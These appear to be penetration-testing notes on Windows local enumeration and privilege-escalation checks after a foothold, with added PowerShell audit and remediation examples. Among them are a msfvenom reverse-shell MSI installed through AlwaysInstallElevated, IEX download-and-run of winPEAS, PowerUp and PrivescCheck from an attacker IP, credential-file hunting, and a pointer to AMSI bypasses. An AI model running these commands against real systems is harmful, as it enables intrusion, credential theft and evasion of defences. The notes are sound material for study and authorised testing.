Local Enum
First moves after foothold on Windows. Same idea as Linux Local Enum but different commands. AD-joined hosts also need AD MOC enum.
i. The first 60 seconds
whoami
whoami /priv
whoami /groups
whoami /all
hostname
[System.Environment]::OSVersion.Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain"
$env:USERDOMAIN
$env:LOGONSERVER
What to look at:
- whoami /priv -> any Enabled privilege that maps to GodPotato / SeBackup etc., see PrivEsc - Tokens & Privileges
- whoami /groups -> Administrators, Backup Operators, DnsAdmins, Hyper-V Admins all = high-value
- systeminfo Domain field -> joined to AD, see AD MOC
ii. Users and groups
net user
net user Administrator
net localgroup
net localgroup Administrators
net accounts ## password policy
PowerShell:
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators
Logged-in users right now:
query user
qwinsta
quser
iii. Processes and network state
tasklist /v /fo list
tasklist /svc
netstat -anob
PowerShell:
Get-Process -IncludeUserName | Select-Object Id,ProcessName,UserName ## -IncludeUserName needs an elevated session; unelevated it errors out, so drop it and accept no owner column
Get-NetTCPConnection -State Listen | Select-Object LocalAddress,LocalPort,OwningProcess
Look for:
- Processes running as NT AUTHORITY\SYSTEM you can interact with
- Listening ports on 127.0.0.1 (internal services)
- Tasks containing creds in command line (tasklist /v shows full cmdline)
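The netstat / Get-NetTCPConnection output above gives a PID but not the process name, path or owner; correlating them is the step that tells you whether a loopback listener is an internal service worth a look. The function below is an added example, not part of the original page: it joins every listening TCP socket to its process and flags loopback-only binds. It assumes the NetTCPIP module (Windows 8 / Server 2012 and later) and that the session may be unelevated, in which case the owner column stays empty because -IncludeUserName requires elevation.

```powershell
## Added example: map each listening TCP socket to its owning process (not from the original page).
function Get-ListeningSocketOwner {
    ## -IncludeUserName only works elevated, so turn it on only when we are; UserName stays $null otherwise
    $elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $procs = @{}
    Get-Process -IncludeUserName:$elevated | ForEach-Object { $procs[$_.Id] = $_ }
    Get-NetTCPConnection -State Listen | ForEach-Object {
        ## OwningProcess is a UInt32; cast to Int32 so the hashtable lookup matches Get-Process's Id
        $p = $procs[[int]$_.OwningProcess]
        [pscustomobject]@{
            LocalAddress = $_.LocalAddress
            LocalPort    = $_.LocalPort
            LoopbackOnly = $_.LocalAddress -in @('127.0.0.1', '::1')   ## internal-only service, reachable just from this host
            ProcessId    = $_.OwningProcess
            Process      = if ($p) { $p.ProcessName } else { '<unknown>' }
            User         = if ($p -and $elevated) { $p.UserName } else { $null }
            Path         = if ($p) { $p.Path } else { $null }          ## $null for other users' processes when unelevated
        }
    }
}

## Loopback listeners first, then by port
Get-ListeningSocketOwner | Sort-Object LoopbackOnly, LocalPort | Format-Table -AutoSize
```

Run it once unelevated and once elevated: the Path and User columns that appear only in the elevated run are exactly the SYSTEM-owned services the "Look for" list refers to.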
iv. Network and routing
ipconfig /all
route print
arp -a
PowerShell:
Get-NetIPConfiguration
Get-NetIPAddress
Get-DnsClientServerAddress
Get-NetRoute
Look for extra interfaces (Hyper-V switches, VPN tunnels, second NIC -> separate networks for Pivoting ).
v. Privileges and tokens
This is the most important single check on Windows. Full table in PrivEsc - Tokens & Privileges.
whoami /priv
Privileges that mean privesc:
- SeImpersonatePrivilege -> Potato attack
- SeAssignPrimaryTokenPrivilege -> Potato attack
- SeBackupPrivilege -> dump SAM/SYSTEM
- SeRestorePrivilege -> write any file
- SeDebugPrivilege -> dump LSASS
- SeLoadDriverPrivilege -> driver tricks
- SeTakeOwnershipPrivilege -> own any file
- SeManageVolumePrivilege -> volume control = file access
- SeTcbPrivilege -> "act as part of OS", basically SYSTEM
vi. AlwaysInstallElevated
A Windows Installer policy misconfiguration that makes any MSI install run as SYSTEM. Check both hives:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Both must be 1 for it to work. If yes:
## On attacker
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f msi -o sh.msi
## On target
msiexec /quiet /qn /i C:\Windows\Temp\sh.msi
vii. Service enum
Service-based privesc surface in PrivEsc - Services & Registry. First-pass enum:
Get-Service | Where-Object {$_.Status -eq 'Running'}
Get-CimInstance -ClassName Win32_Service | Select-Object Name,StartMode,State,StartName,PathName
Service binary writable check (privesc indicator):
$id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })   ## current user plus every group it holds (Users, Authenticated Users, ...)
Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    ## quoted path with spaces -> take what is inside the quotes; unquoted -> first token
    $p = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split ' ')[0] }
    if ($p -and (Test-Path -LiteralPath $p)) {
        ## only Allow ACEs that grant write-type rights to one of our SIDs count
        $writable = (Get-Acl -LiteralPath $p).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.FileSystemRights -match 'Write|FullControl|Modify' -and
            $sids -contains $( try { $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null } )
        }
        if ($writable) { "WRITABLE: $($svc.Name) ($($svc.StartName)) -> $p" }
    }
}
Unquoted service paths (wmic is deprecated and no longer installed by default on newer Windows 11 builds; the Get-CimInstance Win32_Service line above exposes the same PathName column):
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
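Because wmic is on its way out, here is the same unquoted-path check as a PowerShell function, added here as an example and not taken from the original page. It applies the classic rule (auto-start, path not wrapped in quotes, a space inside the executable path, outside C:\Windows) and also prints the quoted binPath= an administrator would set to close the finding; the sc.exe config syntax is real, the three sample services are constructed for illustration.

```powershell
## Added example: PowerShell replacement for the deprecated wmic unquoted-service-path one-liner (not from the original page).
function Get-UnquotedServicePath {
    param([object[]]$Services = (Get-CimInstance -ClassName Win32_Service))
    foreach ($svc in $Services) {
        $path = $svc.PathName
        if (-not $path -or $svc.StartMode -ne 'Auto') { continue }
        if ($path.StartsWith('"')) { continue }                      ## already quoted, loader cannot mis-split it
        ## executable = everything up to and including the first ".exe"; anything after it is arguments
        $argstr = ''
        if ($path -match '^(.*?\.exe)(\s.*)?$') {
            $exe = $Matches[1]
            if ($Matches[2]) { $argstr = $Matches[2].Trim() }
        } else {
            $exe = ($path -split ' ')[0]
        }
        if ($exe -notmatch '\s') { continue }                         ## no space in the path -> not ambiguous
        if ($exe -match '^[A-Za-z]:\\Windows\\') { continue }         ## system directory is not user-writable
        [pscustomobject]@{
            Name   = $svc.Name
            RunsAs = $svc.StartName
            Path   = $path
            ## remediation an administrator would apply (run elevated): wrap the executable in quotes
            Fix    = (('sc.exe config {0} binPath= "\"{1}\" {2}"' -f $svc.Name, $exe, $argstr) -replace ' "$', '"')
        }
    }
}

## Constructed sample rows so the function can be exercised without touching real services
$sample = @(
    [pscustomobject]@{ Name = 'GoodSvc'; StartMode = 'Auto'; StartName = 'LocalSystem'; PathName = '"C:\Program Files\Good\good.exe" -service' }
    [pscustomobject]@{ Name = 'BadSvc';  StartMode = 'Auto'; StartName = 'LocalSystem'; PathName = 'C:\Program Files\Bad App\bad.exe -service' }
    [pscustomobject]@{ Name = 'SysSvc';  StartMode = 'Auto'; StartName = 'LocalSystem'; PathName = 'C:\Windows\System32\svchost.exe -k netsvcs' }
)
Get-UnquotedServicePath -Services $sample | Format-List   ## only BadSvc is reported
Get-UnquotedServicePath | Format-Table -AutoSize           ## live audit of this host
```

An unquoted path is only a finding if one of the directories the loader would try (here C:\Program Files\Bad App\ and C:\Program Files\) is writable by a low-privileged user; pair this output with the ACL check above before calling it exploitable.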
viii. Scheduled tasks
schtasks /query /fo LIST /v
PowerShell:
Get-ScheduledTask | Where-Object {$_.State -ne 'Disabled'} | Select-Object TaskName,TaskPath,Author
## Tasks running as elevated user that you can modify:
Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' -and $_.Principal.UserId -match 'SYSTEM|Administrator' } | ForEach-Object {
    $task = $_   ## keep a handle: $_ is rebound to the action inside the inner loop, so $_.TaskName would be empty there
    $task.Actions | ForEach-Object {
        if (-not $_.Execute) { return }   ## COM-handler actions have no Execute; skip them
        ## expand %windir%-style variables and strip quotes before testing the path
        $exe = [Environment]::ExpandEnvironmentVariables($_.Execute -replace '"','')
        $me  = [regex]::Escape($env:USERNAME)
        if ((Test-Path -LiteralPath $exe) -and ((Get-Acl -LiteralPath $exe).Access | Where-Object { $_.AccessControlType -eq 'Allow' -and $_.FileSystemRights -match 'Write|FullControl|Modify' -and $_.IdentityReference -match "$me|Users|Everyone" })) {
            "WRITABLE TASK: $($task.TaskName) ($($task.Principal.UserId)) -> $exe"
        }
    }
}
ix. Installed software and patch level
wmic product get name,version ## slow: querying Win32_Product triggers an MSI consistency check of every installed package; the Uninstall registry keys below are the safe alternative
wmic qfe list brief
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"KB"
PowerShell:
Get-CimInstance -ClassName Win32_QuickFixEngineering | Select-Object HotFixID,InstalledOn
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName,DisplayVersion
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName,DisplayVersion
Feed systeminfo output to Windows-Exploit-Suggester for kernel exploit candidates, see PrivEsc - Kernel & Exploits.
x. Files of interest
Files that often have creds:
dir /s /b C:\Users\*unattend.xml 2>nul
dir /s /b C:\unattend.xml 2>nul
dir /s /b C:\Windows\Panther\Unattend.xml 2>nul
dir /s /b C:\Windows\Panther\Unattend\Unattend.xml 2>nul
dir /s /b C:\Windows\System32\sysprep\sysprep.xml 2>nul
dir /s /b C:\sysprep.inf 2>nul
GPP cpassword (XML in SYSVOL when on a DC, sometimes cached locally):
findstr /S /I "cpassword" \\domain\sysvol\domain\Policies\*.xml
Saved RDP creds:
cmdkey /list
If cmdkey /list shows targets, use runas /savecred:
runas /savecred /user:DOMAIN\Administrator "cmd.exe"
Browser saved creds, SSH config, MobaXterm files:
Get-ChildItem -Recurse -Force C:\Users\ -ErrorAction SilentlyContinue -Include 'Login Data','wallet*','*.ovpn','*.rdp','sshconfig*','.ssh' 2>$null
xi. PowerShell history
PSReadLine logs every command to a file by default. Read other users’ history if you have rights:
Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object {Write-Host $_.FullName; Get-Content $_.FullName}
This catches inline passwords typed in PowerShell sessions. The single best Windows credential source after LSASS.
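The flip side of that one-liner is hygiene on your own boxes: the same file leaks your own inline passwords to the next person who reads it. The block below is an added example, not from the original page. It scans history lines for the keyword set PSReadLine 2.1+ uses in its default AddToHistoryHandler (password, asplaintext, token, apikey, secret), shows with constructed sample lines where that regex catches secrets and where it does not, and ends with the two options that stop secrets being written at all.

```powershell
## Added example: audit PSReadLine history for inline secrets and show the mitigations (not from the original page).
function Find-SensitiveHistoryLine {
    param(
        [string[]]$Lines,
        ## same keyword set PSReadLine 2.1+ applies by default before saving a command
        [string]$Pattern = 'password|asplaintext|token|apikey|secret'
    )
    $n = 0
    foreach ($line in $Lines) {
        $n++
        if ($line -match $Pattern) { [pscustomobject]@{ Line = $n; Command = $line } }
    }
}

## Constructed sample history: lines 2 and 3 are caught, line 4 is not (no keyword in it)
$sample = @(
    'Get-ChildItem C:\Users',
    '$s = ConvertTo-SecureString "Summer2024!" -AsPlainText -Force',
    'Invoke-WebRequest -Headers @{ apikey = "CONSTRUCTEDKEY123" } https://api.example.test/v1',
    'net use \\fileserver\share /user:corp\svc_backup P@ssw0rd'
)
Find-SensitiveHistoryLine -Lines $sample

## Live audit of the current user's own history file
$hist = (Get-PSReadLineOption).HistorySavePath
if (Test-Path -LiteralPath $hist) { Find-SensitiveHistoryLine -Lines (Get-Content -LiteralPath $hist) }

## Mitigation 1 (current session; put it in $PROFILE to make it stick): never persist history
Set-PSReadLineOption -HistorySaveStyle SaveNothing
## Mitigation 2: keep history but refuse to record matching lines; returning $false drops the command
Set-PSReadLineOption -AddToHistoryHandler { param($cmd) $cmd -notmatch 'password|asplaintext|token|apikey|secret|authorization|/user:' }
```

Line 4 of the sample is the point: a keyword filter is a floor, not a guarantee, so on shared or jump hosts SaveNothing is the setting to enforce.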
xii. Registry hives worth reading
## Saved auto-logon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon
## Putty saved sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
## SNMP community strings
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
## Saved VNC password
reg query "HKCU\Software\ORL\WinVNC3\Password"
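Two of the reg query checks on this page hide an easy false positive: AlwaysInstallElevated (section vi) is only live when the value is 1 in both HKLM and HKCU, and a Winlogon key with AutoAdminLogon set but no DefaultPassword stores nothing useful. The block below is an added example, not from the original page, that turns both checks into functions returning objects (a missing key counts as 0) and lists the remediation an administrator would apply.

```powershell
## Added example: object-returning audit of the AlwaysInstallElevated and Winlogon autologon registry checks (not from the original page).
function Test-AlwaysInstallElevated {
    ## A missing key or a 0 in EITHER hive means MSI packages do NOT run as SYSTEM
    $paths = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($p in $paths) {
        $v = Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($v) { [int]$v.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM        = $values[0]
        HKCU        = $values[1]
        Exploitable = ($values[0] -eq 1 -and $values[1] -eq 1)
    }
}

function Get-WinlogonAutoLogon {
    $k = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        AutoAdminLogon  = $k.AutoAdminLogon
        DefaultUserName = $k.DefaultUserName
        ## report presence only; an audit log should never contain the password itself
        PasswordStored  = [bool]$k.DefaultPassword
    }
}

Test-AlwaysInstallElevated
Get-WinlogonAutoLogon

## Remediation (run elevated):
##  - Set AlwaysInstallElevated to 0 in both hives, and enforce it through GPO:
##    Computer/User Configuration > Administrative Templates > Windows Components > Windows Installer >
##    "Always install with elevated privileges" = Disabled
##  - Drop the clear-text autologon password and switch autologon off:
##    Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name DefaultPassword
##    Set-ItemProperty    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name AutoAdminLogon -Value '0'
```

Both functions read with Get-ItemProperty rather than reg.exe so the result can be filtered or exported like any other object, which matters when the same check runs across a fleet.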
xiii. Run winPEAS
The Windows equivalent of linpeas, much more verbose. Drop and run:
## Pipe execution, no disk write:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/winPEAS.ps1')
## or save and run:
iwr http://10.10.14.1/winPEASx64.exe -OutFile C:\Windows\Temp\wp.exe
C:\Windows\Temp\wp.exe
Read by color the same way as linpeas: red-yellow first.
xiv. PowerUp / Sherlock / PrivescCheck
PowerUp is the classic, PrivescCheck is the modern replacement:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/PrivescCheck.ps1'); Invoke-PrivescCheck
## PowerUp (older but still useful):
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerUp.ps1'); Invoke-AllChecks
Most ps1 tools are signatured. Either run them through an AMSI bypass first or use a fresh fork (search “amsi bypass 2024” on GitHub for working versions). See Defender & AMSI Evasion when those files exist.
xv. Triage checklist
Before opening any privesc file:
- whoami /priv output reviewed
- whoami /groups for privileged group memberships
- Service enum (writable binaries, unquoted paths)
- Scheduled tasks as SYSTEM that you can modify
- AlwaysInstallElevated check
- systeminfo + missing patches
- PowerShell history of all users (where readable)
- Files of interest (Unattend.xml, GPP, saved creds)
- cmdkey /list
- winPEAS red-yellow output
Then work PrivEsc - Tokens & Privileges -> PrivEsc - Services & Registry -> PrivEsc - DLL & Unquoted Paths -> PrivEsc - Credentials & Files. Kernel exploits last.